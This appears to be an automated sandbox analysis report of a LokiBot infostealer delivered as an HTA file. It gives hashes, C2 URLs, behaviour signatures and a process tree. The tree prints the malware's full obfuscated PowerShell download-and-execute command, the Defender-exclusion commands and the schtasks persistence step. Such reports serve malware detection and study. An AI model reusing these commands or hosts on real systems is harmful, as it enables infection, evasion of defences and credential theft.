Analysis

  • max time kernel
    137s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-11-2024 17:41

General

  • Target

    givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta

  • Size

    178KB

  • MD5

    e80a6dc30c45134e8c433ef07277022f

  • SHA1

    9041ab7b0cf03e4c18f86ff32eac95c3ad06f462

  • SHA256

    11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182

  • SHA512

    6156f6fcb24fedaabb7d1d62a0ff71e7bd8c6ab194c1a5c1b7ccc25644ba36dd62a79a8989dba98015044502a64db5c32187b802cc42dc964f25323c352519d8

  • SSDEEP

    96:4vCl17nlkfktbLVe4I9qWs5cew1WyNk6O5Q:4vCldn+s9he4CqWj26O5Q

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.95/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4884
    • C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe
      "C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'JFo3VE02ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFckRFZmluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJwdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGaUVJdnlPaGJJcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWVCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPZ2NBUnYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo3VE02OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjEzNi8zNy9jYXNwb2wuZXhlIiwiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUiLDAsMCk7c1RBUlQtc0xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjYXNwb2wuZXhlIg=='+[CHAr]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3844
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3632
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xth52laq\xth52laq.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4108
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC66D.tmp" "c:\Users\Admin\AppData\Local\Temp\xth52laq\CSC63C1D40E64504A10B5D821BB373F501D.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3332
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:516
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4496
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3400
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp756A.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4492
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:3616

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOwersheLl.eXe.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    344B

    MD5

    de9c9636e5149ab78e79b684f926bd18

    SHA1

    c2a9ec28eb1bb95cbb59908f5b5af21a1e6667d7

    SHA256

    0ed90f5a3554ac83bb776696e38413c88b5da74489d583f0b87820f3c97e9781

    SHA512

    a7de45a62d6f4744d44fe869db0f4c10b1d880b9ec3d75ec6f6eb2d1199878f78b8638e2ce92f35c5ca9d82a66396a0e5d2b06f83afddf13089b061ff0771174

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    17KB

    MD5

    e045109d9c3e2d7e9a4764ba7a3271d8

    SHA1

    64b73e619a0d32faf57fdec82f7ef6a3ec1fb15a

    SHA256

    8643f0e89929d9942ff32630ecaf7dd1e2463e3e84812339fb98590d2f44cb4a

    SHA512

    294f76e4ee3ead1f490ff10da6205351a63e3716c495417c85aa9ab1a6056190a8ede57211f350d5167bb8202ace6a23d6280748256f968c6c276e6529ae3d98

  • C:\Users\Admin\AppData\Local\Temp\RESC66D.tmp

    Filesize

    1KB

    MD5

    9fca0f1355d643f32799547585883d09

    SHA1

    4d21acf2d72dcca12855b8c9d8824739c2107d7f

    SHA256

    f3eaf61d8773cac8e0e3ac8ad9712e2947f1a1335eb6f5822fcec343c401386d

    SHA512

    e047312325e4c39e210fda63dbce24622071af15984aa5f8e5a931951181db0277310a1b434e7276c2abdd4d7f00d6661de210474c23a82030614bce0bd7a67d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wxyjkqly.bwu.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmp756A.tmp

    Filesize

    1KB

    MD5

    94ab2a6063a659d594f083e5cd100baa

    SHA1

    cea556bd8dde1f1b95afb31d556fe447428c431d

    SHA256

    b98b47e9c9a064c4876ca262f645f317e60eb1e5fb68e1ff0e65ac3d98b9fcea

    SHA512

    9e88df7dbe488b82f5d2d31d96052258ab7529a84df3d096c729b9519a96309945bf4bde6ce4948b2aaa55e4ae701bc9e034d826bd3b88dd1c28adccd088a1c0

  • C:\Users\Admin\AppData\Local\Temp\xth52laq\xth52laq.dll

    Filesize

    3KB

    MD5

    f2222918de55ff725e59f71dc97b06fe

    SHA1

    12dd3c4946c5c2371f909e695de8a997c8e84bb0

    SHA256

    8b2cdd2c713aa6cd20243ce4a6025824456093d78f1c461a1e4e2c007ed8248e

    SHA512

    e93ed10f4025d2dcf4ea67f1e83771889d8b636e8963451bd57751da4d7765dd4cadf20910fc182764ee91306535ff12b65845a3a3a66729458302d7f0839e83

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-940901362-3608833189-1915618603-1000\0f5007522459c86e95ffcc62f32308f1_f2cdb6fb-4ab8-4547-9f25-fad1f7a44351

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-940901362-3608833189-1915618603-1000\0f5007522459c86e95ffcc62f32308f1_f2cdb6fb-4ab8-4547-9f25-fad1f7a44351

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    568KB

    MD5

    318ff90d7a2797a041b836f7f8900f62

    SHA1

    fdda6afed7a1643ae353e7a635e6744c2b0a07d5

    SHA256

    241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430

    SHA512

    808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac

  • \??\c:\Users\Admin\AppData\Local\Temp\xth52laq\CSC63C1D40E64504A10B5D821BB373F501D.TMP

    Filesize

    652B

    MD5

    c4ed556b65079a3930f70556acbecde1

    SHA1

    d8ce6a2130e55719540f4c7fff34e436f37a6736

    SHA256

    64af22b653860191344e1143193ac94c60377535f1f2fc0fe050d5019e316406

    SHA512

    224da9e5c05d2670d01e30733347185028919dd9cb8d77730b0205b25c8570294b04a40d6a521d7d878717fda408cb6adc8d91dfe02907a3bbe0e9e5ddf5161c

  • \??\c:\Users\Admin\AppData\Local\Temp\xth52laq\xth52laq.0.cs

    Filesize

    464B

    MD5

    f8419bbc398e1a2b134eec88b333f8f6

    SHA1

    57ebba4cad00272da80b919df0908ec40f9be48a

    SHA256

    25fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3

    SHA512

    b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674

  • \??\c:\Users\Admin\AppData\Local\Temp\xth52laq\xth52laq.cmdline

    Filesize

    369B

    MD5

    ac479e66af8d2b3726d5304e128e2ca1

    SHA1

    f68d985cdbe5208ee1897cd729c74649af16085c

    SHA256

    2d4beb7fa3936cda1d97c2ec13b265bfcba027ad35b13b60340597526fe2fa6a

    SHA512

    a2e4fcde4e12c54c18d1b9b1b247233a51e4babad733064972c3d56f5226469d7411345ec8b13c25e4420d72577d4b706bfd43081cdb89890ab27f4bfe42e978

  • memory/516-87-0x0000000006B70000-0x0000000006B82000-memory.dmp

    Filesize

    72KB

  • memory/516-84-0x0000000005050000-0x00000000050FA000-memory.dmp

    Filesize

    680KB

  • memory/516-83-0x0000000004EA0000-0x0000000004F32000-memory.dmp

    Filesize

    584KB

  • memory/516-80-0x0000000000530000-0x00000000005C4000-memory.dmp

    Filesize

    592KB

  • memory/516-85-0x0000000005530000-0x000000000553A000-memory.dmp

    Filesize

    40KB

  • memory/516-82-0x0000000005550000-0x0000000005AF4000-memory.dmp

    Filesize

    5.6MB

  • memory/516-86-0x0000000005CC0000-0x0000000005D5C000-memory.dmp

    Filesize

    624KB

  • memory/516-88-0x0000000007070000-0x00000000070D4000-memory.dmp

    Filesize

    400KB

  • memory/3400-133-0x000000006DD40000-0x000000006DD8C000-memory.dmp

    Filesize

    304KB

  • memory/3616-115-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/3616-113-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/3632-45-0x0000000007CA0000-0x0000000007CB1000-memory.dmp

    Filesize

    68KB

  • memory/3632-29-0x000000006D7B0000-0x000000006D7FC000-memory.dmp

    Filesize

    304KB

  • memory/3632-28-0x0000000006D70000-0x0000000006DA2000-memory.dmp

    Filesize

    200KB

  • memory/3632-39-0x0000000006D50000-0x0000000006D6E000-memory.dmp

    Filesize

    120KB

  • memory/3632-49-0x0000000007D20000-0x0000000007D28000-memory.dmp

    Filesize

    32KB

  • memory/3632-48-0x0000000007DF0000-0x0000000007E0A000-memory.dmp

    Filesize

    104KB

  • memory/3632-47-0x0000000007CE0000-0x0000000007CF4000-memory.dmp

    Filesize

    80KB

  • memory/3632-46-0x0000000007CD0000-0x0000000007CDE000-memory.dmp

    Filesize

    56KB

  • memory/3632-44-0x0000000007D30000-0x0000000007DC6000-memory.dmp

    Filesize

    600KB

  • memory/3632-43-0x0000000007B00000-0x0000000007B0A000-memory.dmp

    Filesize

    40KB

  • memory/3632-40-0x0000000007A10000-0x0000000007AB3000-memory.dmp

    Filesize

    652KB

  • memory/3632-42-0x00000000077E0000-0x00000000077FA000-memory.dmp

    Filesize

    104KB

  • memory/3632-41-0x0000000008140000-0x00000000087BA000-memory.dmp

    Filesize

    6.5MB

  • memory/3844-5-0x0000000006150000-0x00000000061B6000-memory.dmp

    Filesize

    408KB

  • memory/3844-64-0x0000000006E00000-0x0000000006E08000-memory.dmp

    Filesize

    32KB

  • memory/3844-6-0x00000000061C0000-0x0000000006226000-memory.dmp

    Filesize

    408KB

  • memory/3844-16-0x0000000006230000-0x0000000006584000-memory.dmp

    Filesize

    3.3MB

  • memory/3844-71-0x0000000070EF0000-0x00000000716A0000-memory.dmp

    Filesize

    7.7MB

  • memory/3844-0-0x0000000070EFE000-0x0000000070EFF000-memory.dmp

    Filesize

    4KB

  • memory/3844-70-0x0000000070EFE000-0x0000000070EFF000-memory.dmp

    Filesize

    4KB

  • memory/3844-1-0x0000000005260000-0x0000000005296000-memory.dmp

    Filesize

    216KB

  • memory/3844-4-0x0000000005980000-0x00000000059A2000-memory.dmp

    Filesize

    136KB

  • memory/3844-81-0x0000000070EF0000-0x00000000716A0000-memory.dmp

    Filesize

    7.7MB

  • memory/3844-17-0x0000000006840000-0x000000000685E000-memory.dmp

    Filesize

    120KB

  • memory/3844-2-0x0000000070EF0000-0x00000000716A0000-memory.dmp

    Filesize

    7.7MB

  • memory/3844-3-0x00000000059B0000-0x0000000005FD8000-memory.dmp

    Filesize

    6.2MB

  • memory/3844-18-0x0000000006870000-0x00000000068BC000-memory.dmp

    Filesize

    304KB

  • memory/4496-119-0x000000006DD40000-0x000000006DD8C000-memory.dmp

    Filesize

    304KB

  • memory/4496-143-0x0000000007A60000-0x0000000007A71000-memory.dmp

    Filesize

    68KB

  • memory/4496-144-0x0000000007AA0000-0x0000000007AB4000-memory.dmp

    Filesize

    80KB

  • memory/4496-129-0x0000000007740000-0x00000000077E3000-memory.dmp

    Filesize

    652KB

  • memory/4496-118-0x00000000066C0000-0x000000000670C000-memory.dmp

    Filesize

    304KB

  • memory/4496-102-0x0000000005FD0000-0x0000000006324000-memory.dmp

    Filesize

    3.3MB